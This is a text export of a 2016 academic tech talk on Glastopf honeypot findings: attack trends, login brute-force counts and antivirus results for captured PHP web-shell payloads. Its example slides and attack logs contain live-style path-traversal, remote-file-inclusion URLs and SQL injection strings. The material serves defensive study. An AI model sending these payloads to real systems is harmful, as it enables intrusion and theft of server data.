Web Attack Threat Analysis Experiences with Glastopf honeypot CAE Tech Talk – February 2016 Safwan Omari
[email protected] Assistant professor of MIS College of Business - Lewis University
Outline • Honeypot • Deployment • Attack trends • Terminology • Attack results • Collected payloads
February 18, 2016
CAE Tech Talk
2
Honeypot – glastopf • Web-based vulnerabilities • Google dorks • inurl:”category.asp?catid=“ • Inurl:”content.asp?id=“
• Glastopf announces thousands of vulnerabilities
February 18, 2016
Dork type
Number
Grew to
inurl
3507
10,351
intext
189
same
intitle
346
same
CAE Tech Talk
3
Type of vulnerabilities Vulnerability
Possible attacks
Local File Inclusion Remote File Inclusion
-
SQLi
- Disclosure of sensitive information - Data corruption - Loss of data
February 18, 2016
code execution on the client-side such as JavaScript (XSS) code execution on the web server Sensitive Information Disclosure denial of Service (DoS)
CAE Tech Talk
4
Type of vulnerabilities cont’d -
XSS vulnerability via injection of JavaScript in CSS style sheet Disclosure of sensitive data Run JavaScript in victims browser Http session hijacking
PHPMyAdmin
-
phpMyAdmin is a web-based administration interface for MySQL databases Multiple vulnerabilities Execution of arbitrary commands Compromise of system
phpinfo
-
Php script that discloses server/php information Version of server OS WWW root directory Php Configuration information
Style CSS
February 18, 2016
CAE Tech Talk
5
Example- LFI • http://192.168.56.101/index.php?index=../../../../etc/passwd
February 18, 2016
CAE Tech Talk
6
Example - RFI • http://192.168.56.101/index.php?index=http://pastebin.com/raw.ph p?i=GK9m8dAL
February 18, 2016
CAE Tech Talk
7
Example - SQLi • http://192.168.56.101/index.php?id=22 SELECT database()
February 18, 2016
CAE Tech Talk
8
Example - SQLi • http://192.168.56.101/index.php?id=22 SELECT user()
February 18, 2016
CAE Tech Talk
9
Web application products • phpmyadmin • PHP enter • php-fusion module • Xerox docushare • Foafgen 0.3 • J-Pierre DEZELUS Les Visiteurs 2.0.1 • Many others (php-based and ASP-based)
February 18, 2016
CAE Tech Talk
10
Deployment • Comcast business class network, totally separate from University network • Given DNS names – www, smtp, financials • With little effort, attacker could easily tell it is a university network • Hackers with moderate experience should figure that it is a decoy system
February 18, 2016
CAE Tech Talk
11
Defending the honeypot • Attackers don’t play by the rules, they were trying to take over machine by launching brute force attacks against sshd • Logged in on a daily basis and monitor activity • Successful/bad login attempts • rootkit checks (rkhunter, rootkitchck)
• Fighting bots and backdoors • Monitor for all outgoing connections • Monitor open ports
February 18, 2016
CAE Tech Talk
12
Login attempts • 7143 login attempts originated from 125 unique IPs • From 25 countries – • HK (4714), CN (916), FR (506), VN (301)
• User names tried (account, alex, apache, backup, D-Link and many more) • root, 5648 • support 926 • admin 220
• One IP (43.229.x.x, HK) tried 4150 times • Rest – range from 1 to 524 • Average – 57 times, 24 times without HK attacker February 18, 2016
CAE Tech Talk
13
Terminology/metrics • Event – any http request • Attack • Set of events originating from same IP • Some attackers were determined, came back a few times • Had to consider time between events
• Length of an attack – time between first and last events • Number of events in an attack • Number of patterns in an attack (LFI, RFI, SQLi, etc)
February 18, 2016
CAE Tech Talk
14
Attack - examples • 202.67.X.X –attack (12 events)
• 2015-12-06 02:32:28 /view_faq.php?id=999999.9 or 1=1 • 2015-12-06 02:32:40 /view_faq.php?id=‘ • 2015-12-06 02:33:00 /view_faq.php?id= union all select null,null,null,null,null,null—
• 202.67.X.X – attack 2 (25 events)
• 2015-12-14 01:42:14 /Gallery/view/administrator/components/com_a6mambocredits/m2f/ViewProduct. asp?misc= • 2015-12-14 01:42:34 /Gallery/view/administrator/components/com_a6mambocredits/m2f/ViewProduct. asp?misc=9999 and 1=1 • 2015-12-14 01:42:39 /Gallery/view/administrator/components/com_a6mambocredits/m2f/ViewProduct. asp?misc='
February 18, 2016
CAE Tech Talk
15
Attack world map
Hawaiian Island Maldives
February 18, 2016
CAE Tech Talk
16
Attack trends 5000 400 300
events
attacks
4000
200
3000 2000
100
1000
0
0 0
10
20
30
40
0
day
February 18, 2016
10
20
30
40
day
CAE Tech Talk
17
Event types Type
February 18, 2016
Number
Percentage
Phpinfo
15
0%
RFI
65
0.1%
LFI
315
0.4%
XSS – CSS stylesheet
660
0.8%
Phpmyadmin
7894
9.9%
SQLi
42,572
53.3%
Unknown
27,071
35.4%
CAE Tech Talk
18
Attack events con’d • LFI • Attackers are after – (c:\boot.ini) and (/etc/passwd)
• RFI • http://u-braci.pl/components/com_user/Jubar.txt (Poland) • http://ropadeportiva.sexy/wp-includes/images/id.flv (Godaddy)
February 18, 2016
CAE Tech Talk
19
Top 10 countries - events France 5% Russia 2%
Other 8%
Morocco 6%
Brazil 3%
SG 2%
Turkey 2%
USA 30% Indonesia 39%
China 2%
KR 1%
February 18, 2016
CAE Tech Talk
20
Top 10 countries - attacks Other 27%
NL 2%
Russia 6%
Brazil 5%
China 12%
France 3% DE 2%
MA 2% Indonsia 15%
USA 24% UA 2%
February 18, 2016
CAE Tech Talk
21
Attack diversity 100% 90% 80% 70% 60% 50% 40% 30% 20% 10% 0% unknown
style_css
sqli
Brazil February 18, 2016
France
phpinfo
Moroco CAE Tech Talk
RFI
USA
LFI
phpmyadmin
Indonesia 22
Attack characteristics Country BR FR MA US ID RU CN February 18, 2016
avg. duration-min 1.0 0.5 3.7 0.4 3.6 0.6 3.5
avg. events/attack 16 39 74 31 66 7 5 CAE Tech Talk
total attacks 147 94 66 764 479 185 375 23
Attack characteristics cont’d • One event attacks • see home page and leave (20%)
• Time between events • events/seconds range from 0.0019 to 11.6
• Multiple attacks – • percentage of attackers who with multiple attacks(10%)
February 18, 2016
CAE Tech Talk
24
Time of attacks 70 60
Attacks
50 40 30 20 10 0 0
February 18, 2016
1
2
3
4
5
6
7
8
9
10
11 12 13 Hour of Day
CAE Tech Talk
14
15
16
17
18
19
20
21
22
23
25
Malware analysis • malwr • • • •
Free open malware analysis service based on Cuckoo Trace system calls (APIs) Captures and analyzes network traffic Memory analysis with Volatility
• virustotal • A free online service and subsidiary of Google • Runs multiple antivirus engines and aggregates results • AegisLab, Agnitum, Alibaba, Antiy-AVL, AVG, ClamAV, etc (54 engines)
February 18, 2016
CAE Tech Talk
26
Payloads MD5 Fingerprint
Size (bytes)
Date
Country
Malwr fingerprints
Virustotal hits
Payload-0f788
112350
2015-12-06
Newtown Square, USA
3
0/54
Payload-85a78
41155
2015-12-28
Samara, RU
0
13/54
Payload-214db
1116
2016-01-01
Bogotá, CO
1
35/54
Payload-432d0
112267
2015-12-13
NL
1
0/54
Payload-9162c
5794
2016-01-03
Lassance, BR
0
4/54
Payload-9860d
112302
2015-12-15
Zurich, CH
1
0/54
Payload-a38d2
95138
2015-12-10
Redwood City, US
3
0/52
February 18, 2016
CAE Tech Talk
27
Payload-0f788 • Malwr fingerprints • Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) • Installs itself for autorun at Windows startup
February 18, 2016
CAE Tech Talk
28
Payload-85a78 • Malwr did not detect any fingerprints • Virustotal – 13 hits/54
February 18, 2016
AegisLab
Script.Troj.Agent!c
AhnLab-V3
JS/SARS.S61
Avast
PHP:Agent-MN [Trj]
Bkav
CPRA349.Webshell
DrWeb
PHP.Siggen.16
ESET-NOD32
PHP/Obfuscated.E potentially unwanted
GData
Script.Trojan.Agent.MD5H0A
Ikarus
Backdoor.PHP.WebShell
NANO-Antivirus
Trojan.Html.Agent.bzzhwy
Qihoo-360
php.dkshell.0.116
Sophos
Troj/PhpShel-G
Symantec
PHP.Filesman
VBA32
suspected of Trojan.PHP.Obfuscated
CAE Tech Talk
29
Payload-214db • Malwr fingerprints • Installs itself for autorun at Windows startup
• Virustotal – 35 hits/54
February 18, 2016
ALYac, Ad-Aware, Arcabit, F-Secure, GData, MicroWorld-eScan, nProtect, Bitdefender AVG AegisLab, Antiy-AVL, Kaspersky Agnitum AhnLab-V3 Avast Avira Bkav CAT-QuickHeal ClamAV Comodo Cyren, F-Prot DrWeb ESET-NOD32 Emsisoft Ikarus Microsoft NANO-Antivirus Qihoo-360 Sophos Tencent TrendMicro, TrendMicro-HouseCall CAE Tech Talk VBA32 VIPRE
Backdoor.PHP.ALI PHP/BackDoor.AG Backdoor.PHP.PhpShell.bj!c PHP.ShellBot.M PHP/Shellexec PHP:Agent-RV [Trj] PHP/Shell.CA.2 VEX2650.Webshell HTML.BackDoor.A PHP.Shell-23 UnclassifiedMalware PHP/Small.D PHP.Shell.35 PHP/Small.NAL Backdoor.PHP.ALI (B) Backdoor.PHP.Agent Backdoor:PHP/Shell.C Trojan.Html.Zapchast.bubnpf Malware.Radar01.Gen Troj/PHPBdoor-A Php.Backdoor.Phpshell.Hnuz PHP_SHELL.GLT Backdoor.PHP.Rst.f Backdoor.PHP.C99shell.a (v)
30
Payload-432d0 • Malwr fingerprints • Installs itself for autorun at Windows startup
February 18, 2016
CAE Tech Talk
31
Payload-9162c • Malwr did not detect any fingerprints • Virustotal – 4 hits/54 AhnLab-V3 Avira NANO-Antivirus Qihoo-360
February 18, 2016
PHP/Massmailer PHP/MassMail.4127 Trojan.Html.Mailar.yrjmu php.script.mailsend.3
CAE Tech Talk
32
Payload-9860d • Malwr fingerprints • Installs itself for autorun at Windows startup
February 18, 2016
CAE Tech Talk
33
Payload-a38d2 • Malwr fingerprints • Installs itself for autorun at Windows startup • Performs some HTTP requests (Microsoft-WebDAVMiniRedir/5.1.2600, • Generates Some ICMP traffic
February 18, 2016
CAE Tech Talk
34
Future work • Looking closer into events • Possibility of correlating events – discovering bots • Possibility of fingerprinting tools
• Perform more detailed malware analysis of captured payloads • Change in attacks – pose as a • Bank • Clinic
February 18, 2016
CAE Tech Talk
35
Acknowledgment Swetha Rajshree – Graduate student for her contribution throughout this project
Faisal Abdullah (Chair) and Rami Khasawneh (Dean) for providing access to computing and network resources that made this work possible February 18, 2016
CAE Tech Talk
36